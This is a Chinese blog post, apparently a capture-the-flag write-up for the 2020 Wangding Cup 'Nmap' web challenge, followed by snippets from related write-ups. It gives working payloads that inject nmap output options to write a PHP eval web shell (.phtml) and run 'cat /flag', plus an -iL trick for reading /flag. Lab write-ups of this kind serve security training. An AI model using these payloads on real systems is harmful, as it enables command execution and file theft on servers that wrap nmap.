[网鼎杯 2020 朱雀组]Nmap 1

最新推荐文章于 2024-08-06 21:19:20 发布
最新推荐文章于 2024-08-06 21:19:20 发布
阅读量179 收藏
点赞数
分类专栏: BUUCTF 文章标签: 前端 php nginx
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/123237888
版权 
知识点:nmap的妙用

目录

解题

' <?= @eval($_POST[a]); ?> -oG 1.phtml
//' -oG 1.phtml <?= @eval($_POST[a]); ?>
进入1.phtml
a=system("cat /flag");

或者

' -oN 2.phtml <?=eval($_POST["hack"]);?>'
进入1.phtml
hack=system("cat /flag");

或者

127.0.0.1' -iL /flag -oN vege.txt '
//读取/flag里的ip,在这里是flag里的内容,把flag以标准方式存入vege.txt

相关内容

选项 解释
-oN 标准保存
-oX XML保存
-oG Grep保存
-oA 保存到所有格式

succ3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【学习笔记 48】 buu [网鼎杯 2020 朱雀]Nmap
weixin_43553654的博客
08-11 734
0x00 知识点 NMAP中使用-0G命令可以实现代码写入 0x01 解题思路 打开网站一看发现是一个NMAP网站尝试输入输入任意ip 可以看到这里返回了nmap扫描的结果,这里我们就想到了NMAP里的-oG命令实现代码的写入,那我们这里就可以尝试构造payload,来利用‘拼接,写入我们想要的shell文件 ' <?php @eval($_POST["cmd"]);?> -oG shell.php ' 尝试后发现报错,说明这里有过滤不能直接进行,最后利用fuzz发现过滤了php
网鼎杯2020朱雀-web
ChenZIDu的博客
05-18 3029
nmap那题就基本命令然后还有一个别的方法。 nmap 源码 index.php <? require('settings.php'); set_time_limit(0); if (isset($_POST['host'])): if (!defined('WEB_SCANS')) { die('Web scans disabled'); } $host = $_POST['host']; if(stripos($host,'php')!==false){ di
BUUCTF Web [网鼎杯 2020 朱雀]Nmap1
网安小趴菜
11-16 694
BUUCTF Web [网鼎杯 2020 朱雀]Nmap wp1
[网鼎杯 2020 朱雀]Nmap(详细解读版)
weixin_73399382的博客
07-27 983
这道题考察nmap的一些用法,以及escapeshellarg和escapeshellcmd两个函数的绕过,可以看这里两种解题方法:第一种通过nmap的-iL参数读取扫描一个文件到指定文件中第二种是利用nmap的参数写入webshell-oN 标准保存-oX XML保存-oG保存-oA 保存到所有格式。
web buuctf [网鼎杯 2020 朱雀]Nmap1
weixin_44214568的博客
04-05 1753
考点:namp注入 参考web buuctf [BUUCTF 2018]Online Tool1_半杯雨水敬过客的博客-CSDN博客 1. 2.利用NMAP里的-oG命令实现代码的写入,那我们这里就可以尝试构造payload,来利用‘拼接,写入我们想要的shell文件 我们直接用那道buu里的payload: ' <?php eval($_POST["cmd"]);?> -oG zhuque.php ' 注入之后发现存在过滤,fuzz,过滤了php (1)利用<?=来代替.
[网鼎杯 2020 朱雀]Nmap1
最新发布
kw741951的博客
08-06 164
看到这里我们猜测,输入的东西是被escapeshellarg和escapeshellcmd处理过后的结果。输入发现报错,但是没事,继续输入haha'得到flag。我们试着输入127.0.0.1 \| ls试一下。随便输入本地ip试一下127.0.0.1。输入127.0.0.1 | ls看一下。可以看到输入的|被转义字符\转义了。我们输入的东西必须绕过这两个函数。看样子是nmap扫描了。打开题目看到如下信息。
[网鼎杯 2020 朱雀]nmap
03-16
nmap是一款网络扫描工具,可以用来扫描目标主机的开放端口、操作系统类型、服务版本等信息。它可以帮助安全人员评估网络安全状况,发现潜在的漏洞和攻击面。同时,nmap也可以用来管理网络,例如发现新设备、检查网络...
网鼎杯青龙18道.rar
06-11
【标题】"网鼎杯青龙18道.rar"是一个关于网络安全竞赛的资源压缩包,其中包含了2020网鼎杯青龙的比赛题目。网鼎杯是一项知名的网络安全技术竞赛,旨在提升参赛者的网络安全技能和实战能力,尤其针对青龙,...
Nmap扫描实战命令汇总
啊渊的专栏
07-26 999
Nmap实战详解
[网鼎杯 2020 朱雀]Nmap
sGanYu
11-12 2820
这道题与[BUUCTF 2018]Online Tool的解题方式一些有些类似,都是利用nmap上传文件连接,主要考察nmap的一些用法 首先右击查看源码,提示flag在/flag下 进行简单的ping操作 nmap下的选项 -oN 标准保存 -oX XML保存 -oG Grep保存 -oA 所有格式保存 构造payload:' <?php @eval($_POST["hack"]);?> -oG hack.php ' php被.
[网鼎杯 2020 朱雀]Nmap 1两种解法
weixin_53150482的博客
07-19 486
[网鼎杯 2020 朱雀]Nmap 1两种解法
2020/7/15 - [网鼎杯 2020 朱雀]Nmap - nmap写入webshell
抒情诗
07-15 649
这个题和前几天做的online tools有异曲同工之妙啊。都是在线工具类的漏洞。 本文思路1 127.0.0.1' <?=eval($_POST[a]);?> -oG 1.phtml
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值